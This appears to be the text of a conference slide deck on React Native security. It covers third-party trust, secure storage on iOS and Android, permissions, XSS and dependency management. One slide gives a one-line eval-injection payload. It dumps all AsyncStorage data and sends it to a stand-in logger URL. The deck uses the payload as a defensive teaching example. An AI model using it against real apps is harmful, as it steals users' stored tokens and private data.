React Native Security Addressing Typical Mistakes JULIA POTAPENKO

About me Security Software Engineer at Cossack Labs We help companies to protect their sensitive and valuable data. @julepka

We will talk about Architecture Platforms usage Dependencies

“Choosing React Native and its components means that you understand and accept potential security consequences.”

Architecture basics React Native is a cross-platform solution from Facebook that allows writing native apps using React (JavaScript or TypeScript).

Trusting third parties Apple and Google are must haves. Add Facebook to the list.

Trusting third parties Apple and Google are must haves. Add Facebook to the list.

Trusting third parties Apple and Google are must haves. Add Facebook to the list. CVE-2020-1911 CVE-2020-1912 CVE-2020-1913

“Working with React Native developers deal with security for all three platforms: iOS, Android and React Native.”

OWASP Mobile Top 10 #1 Improper platform usage

React Native is a leaky abstraction @vixentael

Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data stored encrypted Yes Yes

Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data stored encrypted Yes Yes Data persists across app reinstalls Yes No Hardware-backed encryption Yes Depends on device vendor Data decrypted only before usage Decrypted when device unlocked Yes

Managing Android Permissions Android: You can add permissions in multiple files

Managing Android Permissions Android: You can add permissions in multiple files + React Navite: It is common practice to use third-party solutions

Managing Android Permissions Android: You can add permissions in multiple files + React Navite: It is common practice to use third-party solutions =

Managing Android Permissions Android: You can add permissions in multiple files + React Native: It is common practice to use third-party solutions = I don’t need this permission The app crashes if I delete it

Is XSS possible? XSS possibility is decreases by design.

Is XSS possible? XSS possibility is decreases by design. XSS is still possible. eval() _reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result) {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); Steal all the data from local storage (AsyncStorage) by exploiting eval-based injection and accessing React Native APIs

Apart from Source Code Annual BIS Reports US encryption export regulations Apple privacy rules User acknowledgement about private data usage

“50 shades of dependencies”

A typical day for React Native app developer

A typical day for React Native app developer (It is joke )

Monitoring dependencies

Monitoring dependencies So many dependencies Additional CI work Integrating dependency checkers

Monitoring dependencies So many dependencies Additional CI work One update triggers another update Integrating dependency checkers Updates may be incompatible What if there is no fix for vulnerability?

✅ Learn more about the issue, its scope ✅ Document it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix?

✅ Learn more about the issue, its scope ✅ Document it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix? React Native requires team to plan time more carefully

React Native requires team to plan time more carefully ➡ iOS or Android update ➡ React Native update ➡ Forked version update ➡ Dependencies update ➡ Mobile app source code update

Final Thoughts “Learn once, write anywhere.” “Learn once, ask mobile security people for help.”

Where to go next My React Native Security Article https://www.cossacklabs.com/blog/react-native-app-security.html React Native Security Guide https://reactnative.dev/docs/security

Thank You! @julepka